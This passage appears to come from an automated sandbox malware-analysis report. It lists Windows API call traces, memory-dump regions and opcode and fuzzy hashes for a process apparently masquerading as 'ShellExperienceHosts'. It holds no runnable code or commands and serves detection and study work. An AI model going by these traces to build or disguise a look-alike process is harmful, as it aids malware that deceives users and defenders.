• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: CaptureRectWindow$Visible$ClientEmptyH_prolog3_MessageReleaseScreenSend
• String ID:
• API String ID: 865670441-0
• Opcode ID: a957a4430872df890fb18a1823f00562ed6deb6ec60a42573bdbfa46d13c3b54
• Instruction ID: 6c09cdcd728ac82353f8c44cb933cb052c7ccb28a6b03a0d0b820c326ff825e6
• Opcode Fuzzy Hash: a957a4430872df890fb18a1823f00562ed6deb6ec60a42573bdbfa46d13c3b54
• Instruction Fuzzy Hash: 20A1AF71B00609EFCF09EFA4C944AEDBBF5FF48309F24412AE412AB650DB31A945CB91
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,29759B20), ref: 10005A65
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005B04
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B42
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B67
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005C5F
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005C80
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B8C
  • Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
  • Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1
• InterlockedExchange.KERNEL32(?,00000000), ref: 10005CF1
• timeGetTime.WINMM ref: 10005CF7
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 10005D0B
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005D14
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
Similarity
• API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
• String ID:
• API String ID: 1400036169-0
• Opcode ID: c8c359a865a91754db648c7caefba5610723c896864770a6932f917ef1d9d91d
• Instruction ID: f393ff6f41c53dec0a4a663a217bd1082015950f507b03806f4406e75142b299
• Opcode Fuzzy Hash: c8c359a865a91754db648c7caefba5610723c896864770a6932f917ef1d9d91d
• Instruction Fuzzy Hash: 7AA1D7B0A01A56AFE354CF6AC8C479AFBE8FB08344F50862EE11DD7640D775A964CF90
APIs
• SetLastError.KERNEL32(0000139F,100191B0,100151A4,?,?,00000001), ref: 02234C9D
• RtlEnterCriticalSection.NTDLL(?), ref: 02234CC4
• SetLastError.KERNEL32(0000139F), ref: 02234CD8
• RtlLeaveCriticalSection.NTDLL(?), ref: 02234CDF
Memory Dump Source
• Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
Similarity
• API ID: CriticalErrorLastSection$EnterLeave
• String ID:
• API String ID: 2124651672-0
• Opcode ID: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
• Instruction ID: b6a19b9ce8b07e10e7fb209bb02b9c53a9c06097de3b1cec22a9352bd4bc4490
• Opcode Fuzzy Hash: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
• Instruction Fuzzy Hash: EA519EB6A04605DFD711EFA8C984B6AF7F5FF48711F04856AE90A8B740E775E800CB91
APIs
• SetLastError.KERNEL32(0000139F,29759B20,745947A0,?,?,00000001), ref: 10004CC6
• EnterCriticalSection.KERNEL32(?,29759B20,745947A0,?,?,00000001), ref: 10004CED
• SetLastError.KERNEL32(0000139F), ref: 10004D01
• LeaveCriticalSection.KERNEL32(?), ref: 10004D08
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
Similarity
• API ID: CriticalErrorLastSection$EnterLeave
• String ID:
• API String ID: 2124651672-0
• Opcode ID: f9e9e3c5f85a9396c58d0e811c6a772e6e8b8bf194744a3e55c98ac89ef18c7f
• Instruction ID: f936773d66b76d96f3ecbf8df82172045f4aecfa059d2fdb31757c61ce649d4c
• Opcode Fuzzy Hash: f9e9e3c5f85a9396c58d0e811c6a772e6e8b8bf194744a3e55c98ac89ef18c7f
• Instruction Fuzzy Hash: 5351BCB6A04601DFE311DFA8D985B6AB7F4FF48751F01462EE90A8B740DB36E8008B91
APIs
• __EH_prolog3_GS.LIBCMT ref: 6C6EE9AF
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000464), ref: 6C6EEA4B
• GetFullPathNameW.KERNEL32(?,00000104,?,?,?,?,?,00000464), ref: 6C6EEAA6
• GetFileTime.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,?,00000464), ref: 6C6EEB56
• SetFileTime.KERNEL32(?,?,?,?,?,?,?,00000464), ref: 6C6EEB8D
• GetFileSecurityW.ADVAPI32(?,00000004,00000000,00000000,?,?,?,?,00000464), ref: 6C6EEBA7
• GetFileSecurityW.ADVAPI32(?,00000004,00000000,?,?,?,?,?,00000464), ref: 6C6EEBD0
• SetFileSecurityW.ADVAPI32(?,00000004,00000000,?,?,?,00000464), ref: 6C6EEBE0
  • Part of subcall function 6C7BC0FD: PathStripToRootW.SHLWAPI(00000000,?,00000104,?,00000104,?,6C7BC6EA,?,?), ref: 6C7BC131
Strings
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: File$Security$PathTime$DiskFreeFullH_prolog3_NameRootSpaceStrip
• String ID: MFC
• API String ID: 3423035918-3472178984
• Opcode ID: 81e1e886203599cd4ae597b87a43e84f630cecb8c94524e36650ac016f4f2af9
• Instruction ID: a37737fff081aab31429beaa99449e715e3443f158834c7395b76462250aa1d9
• Opcode Fuzzy Hash: 81e1e886203599cd4ae597b87a43e84f630cecb8c94524e36650ac016f4f2af9
• Instruction Fuzzy Hash: FF6185B29051189BDF259F50CD84FEE777DAF49308F0041D6A619E6580EB30EE88CF69
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
Similarity
• API ID: _memset$_wcsrchr
• String ID: D
• API String ID: 170005318-2746444292
• Opcode ID: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
• Instruction ID: e2aeb643c3da6de2a54cd396b2fad5ffb9e0019fd854701af329e7b1b882c0de
• Opcode Fuzzy Hash: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
• Instruction Fuzzy Hash: 5C5104B994075C7BDB24EBA4CC85FEA7378AF5C701F404595E60DAA080EB709694CFA1
APIs
• WSASetLastError.WS2_32(0000000D), ref: 02234F1A
• RtlEnterCriticalSection.NTDLL(?), ref: 02234F2F
• WSASetLastError.WS2_32(00002746), ref: 02234F41
• RtlLeaveCriticalSection.NTDLL(?), ref: 02234F48
• timeGetTime.WINMM ref: 02234F76
• timeGetTime.WINMM ref: 02234F9E
• SetEvent.KERNEL32(?), ref: 02234FDC
• InterlockedExchange.KERNEL32(?,00000001), ref: 02234FE8
• RtlLeaveCriticalSection.NTDLL(?), ref: 02234FEF
• RtlLeaveCriticalSection.NTDLL(?), ref: 02235002
Memory Dump Source
• Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
Similarity
• API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
• String ID:
• API String ID: 1979691958-0
• Opcode ID: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
• Instruction ID: 12a1791f281b6091c5355299a8e2ebfd395621755f417f05ee2972d31d8a3d28
• Opcode Fuzzy Hash: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
• Instruction Fuzzy Hash: 0E41F9B1610301DFD722AFA8C988B6AB7F9FF4C315F188599E84ACB255D776E441CB80
APIs
• WSASetLastError.WS2_32(0000000D), ref: 10004F43
• EnterCriticalSection.KERNEL32(?), ref: 10004F58
• WSASetLastError.WS2_32(00002746), ref: 10004F6A
• LeaveCriticalSection.KERNEL32(?), ref: 10004F71
• timeGetTime.WINMM ref: 10004F9F
• timeGetTime.WINMM ref: 10004FC7
• SetEvent.KERNEL32(?), ref: 10005005
• InterlockedExchange.KERNEL32(?,00000001), ref: 10005011
• LeaveCriticalSection.KERNEL32(?), ref: 10005018
• LeaveCriticalSection.KERNEL32(?), ref: 1000502B
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
Similarity
• API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
• String ID:
• API String ID: 1979691958-0
• Opcode ID: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
• Instruction ID: 4b24d02a6ebada58952bd9850e7d83bafc68aeb9978cf5702291cfe2885936af
• Opcode Fuzzy Hash: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
• Instruction Fuzzy Hash: 91410971600242DFF320DF68C988B5AB7F5FF48395F068569E54ACB255EB76EC408B81
APIs
• __EH_prolog3_GS.LIBCMT ref: 6C70C982
  • Part of subcall function 6C6E2BB1: __EH_prolog3.LIBCMT ref: 6C6E2BB8
  • Part of subcall function 6C6E2BB1: GetDC.USER32(00000000), ref: 6C6E2BE4
• IsRectEmpty.USER32(?), ref: 6C70C99D
• InvertRect.USER32(?,?), ref: 6C70C9B3
• SetRectEmpty.USER32(?), ref: 6C70C9C0
• GetClientRect.USER32(?,?), ref: 6C70CA04
• GetSystemMetrics.USER32(00000015), ref: 6C70CA1F
• GetSystemMetrics.USER32(00000015), ref: 6C70CA46
• SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6C70CA87
• SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6C70CAB7
• InvertRect.USER32(?,?), ref: 6C70CAC3
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: Rect$EmptyInvertMessageMetricsSendSystem$ClientH_prolog3H_prolog3_
• String ID:
• API String ID: 3401445556-0
• Opcode ID: 2dee2da76387749a256e8d2f23b9aaf69f23e360d600b58bfcfc21cbc8e72323
• Instruction ID: 83bab43faeb15b7cb158dfbefcdfc62c358edbcc665e4ccb98f787cda89f2699
• Opcode Fuzzy Hash: 2dee2da76387749a256e8d2f23b9aaf69f23e360d600b58bfcfc21cbc8e72323
• Instruction Fuzzy Hash: 57419DB2A10214EFCF15DFA4CA89ADD7BB5FF49709F050178E806AB255DB30AD45CBA0
                                                                            APIs
                                                                            • GetCapture.USER32 ref: 6C7BEDD2
                                                                            • WindowFromPoint.USER32(?,00000000), ref: 6C7BEDE0
                                                                            • GetActiveWindow.USER32 ref: 6C7BEE01
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6C7BEE1B
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 6C7BEE2B
                                                                            • GetDesktopWindow.USER32 ref: 6C7BEE40
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$ActiveCaptureCurrentDesktopFromPointProcess
                                                                            • String ID:
                                                                            • API String ID: 1298419125-0
                                                                            • Opcode ID: 44974ae49c8d32af5ba57fd2ef66a675679c9cdaa727dd2a52a25b0a3d4e7402
                                                                            • Instruction ID: 79dfe33c7c6958f4a089fc47eca98f2b161f66e4436bb6a2540f3925daaeeeb4
                                                                            • Opcode Fuzzy Hash: 44974ae49c8d32af5ba57fd2ef66a675679c9cdaa727dd2a52a25b0a3d4e7402
                                                                            • Instruction Fuzzy Hash: 96311C31A05129EBEF159FB4CA4865EB7B8BF45349F1045B9F416B7B40DB34A940CBD0
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 6C7C048C
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(?), ref: 6C7C1623
                                                                              • Part of subcall function 6C7C161A: GetSystemMenu.USER32(?,00000000,?,?,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?), ref: 6C7C1649
                                                                              • Part of subcall function 6C7C161A: SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C1671
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(00000000), ref: 6C7C167A
                                                                              • Part of subcall function 6C7C161A: IsZoomed.USER32(?), ref: 6C7C1689
                                                                              • Part of subcall function 6C7C161A: EnableMenuItem.USER32(?,0000F000,00000003), ref: 6C7C169D
                                                                              • Part of subcall function 6C7C161A: EnableMenuItem.USER32(?,0000F010,00000003), ref: 6C7C16AD
                                                                              • Part of subcall function 6C7C161A: EnableMenuItem.USER32(?,0000F030,00000003), ref: 6C7C16BE
                                                                              • Part of subcall function 6C7C161A: EnableMenuItem.USER32(?,0000F030,00000000), ref: 6C7C1703
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(00000000), ref: 6C7C170C
                                                                              • Part of subcall function 6C7C161A: DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C1730
                                                                              • Part of subcall function 6C7C161A: DeleteMenu.USER32(?,0000F030,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C173C
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(00000000), ref: 6C7C1745
                                                                              • Part of subcall function 6C7C161A: DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C1769
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(00000000), ref: 6C7C1780
                                                                              • Part of subcall function 6C7C1B39: __EH_prolog3.LIBCMT ref: 6C7C1B40
                                                                            • KillTimer.USER32(?,0000EC1A,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C04BE
                                                                            • GetFocus.USER32 ref: 6C7C054D
                                                                            • SetTimer.USER32(?,0000EC1A,000000C8,00000000), ref: 6C7C0594
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$ItemParent$Enable$Delete$Timer$DefaultFocusH_prolog3KillRectSystemWindowZoomed
                                                                            • String ID: ~=ol
                                                                            • API String ID: 2532734362-544613483
                                                                            • Opcode ID: 9257b71203c9d1a09a925be0265cf0bf83d40853d61d38f5851913bedb1c4353
                                                                            • Instruction ID: c006302e17e731e83cdab81403b45cd5253299ea0a7e171e86a0b2a95acc3a77
                                                                            • Opcode Fuzzy Hash: 9257b71203c9d1a09a925be0265cf0bf83d40853d61d38f5851913bedb1c4353
                                                                            • Instruction Fuzzy Hash: EB31DDF1B0424A9FDF209F78DA58E9E76B1BF0930CF100539E552A3950D7309640CBD2
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,00000001), ref: 6C738A14
                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C738A24
                                                                            • EncodePointer.KERNEL32(00000000), ref: 6C738A2D
                                                                            • DecodePointer.KERNEL32(00000000,00000000,00000001), ref: 6C738A3B
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 6C738A63
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeDirectoryEncodeHandleModuleProcSystem
                                                                            • String ID: SetDefaultDllDirectories$\$kernel32.dll
                                                                            • API String ID: 2101061299-3881611067
                                                                            • Opcode ID: 94018c52086938e912e38144f415429bb0c436c6d653ad294817a77a8f782960
                                                                            • Instruction ID: 3fc6b49fb281047313ddc285fb58c2ba1b900f7cb7364ccbc8d5c90ba6c774b6
                                                                            • Opcode Fuzzy Hash: 94018c52086938e912e38144f415429bb0c436c6d653ad294817a77a8f782960
                                                                            • Instruction Fuzzy Hash: A521A771B41329A6CB20DF758E0CBDA37BC7B05398F140977A808D3601E774DA44CB91
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C75EE49
                                                                            • OleDuplicateData.OLE32(00000000,?,00000000), ref: 6C75EEDA
                                                                            • GlobalLock.KERNEL32(00000000), ref: 6C75EEFC
                                                                            • CopyMetaFileW.GDI32(?,00000000,?,6C815C03,?,00000000,?,?), ref: 6C75EF0A
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 6C75EF18
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6C75EF1F
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 6C75EF2C
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,00000000,00000054,?,6C815C03,?,00000000,?,?), ref: 6C75F0D8
                                                                            • CoTaskMemAlloc.OLE32(?,00000000,00000000,?,00000054,?,6C815C03,?,00000000,?,?), ref: 6C75F12F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Global$CopyFileUnlock$AllocDataDuplicateFreeH_prolog3_LockMetaTask
                                                                            • String ID:
                                                                            • API String ID: 66112031-0
                                                                            • Opcode ID: 910836f44ff6491ba634eeb24d8a9681d83b7a2967a5974bf23775ed8aba5ab8
                                                                            • Instruction ID: 584d219ade5204a72a821a557208a0002aaeaf466b840de3973d60256101e8b1
                                                                            • Opcode Fuzzy Hash: 910836f44ff6491ba634eeb24d8a9681d83b7a2967a5974bf23775ed8aba5ab8
                                                                            • Instruction Fuzzy Hash: 3C9190B1A00515EFDB148F64CE48D2ABBB9FF897487448228F416DBA54DF35EC20CBA1
                                                                            APIs
                                                                            • SetRectEmpty.USER32(?), ref: 6C708AE1
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C708B3A
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C708B49
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Invalidate$Empty
                                                                            • String ID:
                                                                            • API String ID: 1126320529-0
                                                                            • Opcode ID: d1bd1f21fd47d66fdd015fe635336d3a92d235080eb18c01f8094aa5448d2add
                                                                            • Instruction ID: 2040b8c373be0c59e55830aceeab0060a04152bad6d8ed3eb2b1e0a5fedb8188
                                                                            • Opcode Fuzzy Hash: d1bd1f21fd47d66fdd015fe635336d3a92d235080eb18c01f8094aa5448d2add
                                                                            • Instruction Fuzzy Hash: 317127B1B00619DFCF05CF64C984AAE77B6BF49315F2501BAE812AB251CB71AE41CF90
                                                                            APIs
                                                                              • Part of subcall function 10003660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 10003667
                                                                              • Part of subcall function 10003660: _free.LIBCMT ref: 1000369C
                                                                              • Part of subcall function 10003660: _malloc.LIBCMT ref: 100036D7
                                                                              • Part of subcall function 10003660: _memset.LIBCMT ref: 100036E5
                                                                            • InterlockedIncrement.KERNEL32(1001D990), ref: 10003565
                                                                            • InterlockedIncrement.KERNEL32(1001D990), ref: 10003573
                                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 1000359A
                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 100035B3
                                                                            • ResetEvent.KERNEL32(?,?,?,1001D990), ref: 100035EE
